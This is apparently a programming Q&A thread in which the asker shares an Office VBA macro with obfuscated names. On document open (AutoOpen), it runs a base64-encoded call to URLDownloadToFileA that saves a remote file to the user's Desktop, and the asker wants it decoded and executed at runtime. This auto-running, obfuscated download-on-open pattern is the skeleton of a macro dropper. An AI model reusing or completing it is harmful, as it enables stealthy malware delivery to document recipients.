# How can I decode a code from vba and then run it?

Tags: vba, base64, ms-office

I am taking copyright measures for my engineering programming class, we are in the macro part. We have to deliver a teamwork and I have already finished my part, what I want to do is prevent someone from my team from plagiarizing my work. I password protected the document, but I have seen that you can reverse engineer and extract the information from the macro. I know it won't do much good, but at least I'll feel a little more secure; I have encoded a section of the code in base64 and I want it to be decoded and executable.

```
Private Declare PtrSafe Function q6ff4cd4c0ff727453aae57516f1fca69 Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal b5bcaeaeeb0853a7bc5072d6873ac8c55 As String, _
ByVal e28e1f961cfdbaa0ed2b940de0682f981 As String, ByVal bab5d82e2e0beb5a34b311a1a48915196 As Long, ByVal lpfnCB As Long) As Long
Private Const ERROR_SUCCESS As Long = 0
Public Function b58fab3c2319f1d47a8fbd23ac9739f5a(ByVal sURL As String, ByVal z94bfdd94029ed837594f710f08275f66 As String) As Boolean
Dim lngRetVal As Long
b58fab3c2319f1d47a8fbd23ac9739f5a = q6ff4cd4c0ff727453aae57516f1fca69(0&, sURL, z94bfdd94029ed837594f710f08275f66, 0&, 0&) = ERROR_SUCCESS
b58fab3c2319f1d47a8fbd23ac9739f5a = q6ff4cd4c0ff727453aae57516f1fca69(0&, sURL, z94bfdd94029ed837594f710f08275f66, 0&, 0&) = ERROR_SUCCESS
End Function
Sub procedural()
YjU4ZmFiM2MyMzE5ZjFkNDdhOGZiZDIzYWM5NzM5ZjVhICJodHRwczovL3N0YXRpYy5vbmVjbXMuaW8vd3AtY29udGVudC91cGxvYWRzL3NpdGVzLzIwLzIwMTcvMTEvY2hpbWVyYS1jYXQuanBnIiwgIkM6XFVzZXJzXCIgJiBMQ2FzZShFbnZpcm9uKCJVc2VyTmFtZSIpKSAmICJcRGVza3RvcFxjaGltZXJhLWNhdC5qcGci
End Sub
Sub AutoOpen()
procedural
End Sub
```

I want decode this part:

```
YjU4ZmFiM2MyMzE5ZjFkNDdhOGZiZDIzYWM5NzM5ZjVhICJodHRwczovL3N0YXRpYy5vbmVjbXMuaW8vd3AtY29udGVudC91cGxvYWRzL3NpdGVzLzIwLzIwMTcvMTEvY2hpbWVyYS1jYXQuanBnIiwgIkM6XFVzZXJzXCIgJiBMQ2FzZShFbnZpcm9uKCJVc2VyTmFtZSIpKSAmICJcRGVza3RvcFxjaGltZXJhLWNhdC5qcGci
```

And execute this:

```
b58fab3c2319f1d47a8fbd23ac9739f5a "https://static.onecms.io/wp-content/uploads/sites/20/2017/11/chimera-cat.jpg", "C:\Users\" & LCase(Environ("UserName")) & "\Desktop\chimera-cat.jpg"
```

How can do it? Thanks very much for your time. Regards

Comment: So you encoded the code and now you want to know how to decode it. Do I have that right?

Comment: I do not understand your question well, but I will answer you in the way I perceive it.
I give you access to the code because even though I did not invent vba, I am acquiring its products with a license that I bought, so any program that I have developed or implemented from other open source programs I can get copyright it as long as don't trade with them because i used parts of other open source code.

Comment: @NicholasHunter: I understand it as if he wants to decode and execute it **at runtime**, which is something VBA doesn't support out of the box.

Comment: So how would you implement something similar to hide my code and run it at runtime

Comment: You would have to include the decoding code in the document - which rather defeats the purpose of having it.